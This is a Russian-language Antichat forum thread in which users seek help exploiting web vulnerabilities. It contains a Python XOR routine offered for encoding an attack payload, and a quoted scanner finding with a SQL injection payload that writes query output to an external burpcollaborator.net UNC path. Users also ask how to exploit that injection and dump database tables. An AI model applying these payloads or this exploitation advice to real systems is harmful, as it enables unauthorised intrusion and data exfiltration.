ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.01.2020, 13:59
|
|
Участник форума
Регистрация: 04.05.2017
Сообщений: 244
Провел на форуме:
94763
Репутация:
6
|
|
Я как понял ни кто мне не подскажет
|
|
|
01.01.2020, 20:56
|
|
Постоянный
Регистрация: 16.11.2018
Сообщений: 620
Провел на форуме:
169390
Репутация:
47
|
|
Сообщение от madik
↑
Ребят такой вопрос известно где находится уязвимость, но не могу понять как мне payload пронать через xor, уязвимый скрипт принимает даные в хоре а потом уже у себя их распаковывает подскажите плиз
def CB_XORm(data, key):
j=0
key = list(key)
data = list(data)
tmp = list()
for i in range(len(data)):
tmp.append(chr(ord(data
)^ord(key[j])))
j += 1
if j > (len(key)-1):
j = 0
return "".join(tmp)
Если вы знаете key, то прогоните ваш payload через эту же фукнцию и получите зашифрованный payload, который вы отправяете серверу.
|
|
|
|
02.01.2020, 16:57
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
Сообщение от brown
↑
_on=0%20into%20outfile%20'%5c%5c%5c%5cil795b45129i xd3s13rbi2jn1e77v9j0nofb9zy.burpcollaborator.net%5 c%5caju'%3b%20--%20
n
parameter appears to be vulnerable to SQL injection attacks. The payload
into outfile '\\\\il795b45129ixd3s13rbi2jn1e77v9j0nofb9zy.burpc ollaborator.net\\aju'; --
was submitted in the on. This payload causes the database to write the results of the query to a file, and specifies a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
как крутануть такую скулю?мап не берет(
Через коллоборатор только ручками пока что. Ну или пишите софт сами, готовых реализаций пока что не видел.
|
|
|
|
13.01.2020, 06:18
|
|
Участник форума
Регистрация: 04.05.2017
Сообщений: 244
Провел на форуме:
94763
Репутация:
6
|
|
Сообщение от fandor9
↑
Если вы знаете key, то прогоните ваш payload через эту же фукнцию и получите зашифрованный payload, который вы отправяете серверу.
поподробнее можно?
|
|
|
|
27.01.2020, 02:04
|
|
Познающий
Регистрация: 17.04.2011
Сообщений: 63
Провел на форуме:
24943
Репутация:
8
|
|
Народ напишите пожалуйста команды
sql-shell , типа:
- вывести все таблицы с базы
простой синтаксис sql не хочет работать.
|
|
|
|
27.01.2020, 03:51
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от RedHazard
↑
Народ напишите пожалуйста команды
sql-shell , типа:
- вывести все таблицы с базы
простой синтаксис sql не хочет работать.
Что?
|
|
|
|
28.01.2020, 03:31
|
|
Познающий
Регистрация: 17.04.2011
Сообщений: 63
Провел на форуме:
24943
Репутация:
8
|
|
|
|
|
|
28.01.2020, 10:11
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786
Репутация:
40
|
|
|
|
|
|
29.01.2020, 00:30
|
|
Познающий
Регистрация: 17.04.2011
Сообщений: 63
Провел на форуме:
24943
Репутация:
8
|
|
Сообщение от BabaDook
↑
Ну, так и пиши команды.
ты наверное не увидел моего вопроса ?
Сообщение от None
Народ напишите пожалуйста команды
sql-shell , типа:
- вывести все таблицы с базы
простой синтаксис sql не хочет работать.
|
|
|
|
29.01.2020, 09:21
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от RedHazard
↑
ты наверное не увидел моего вопроса ?
Если простой sql синиакс не работает, то тебе никто не поможет.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
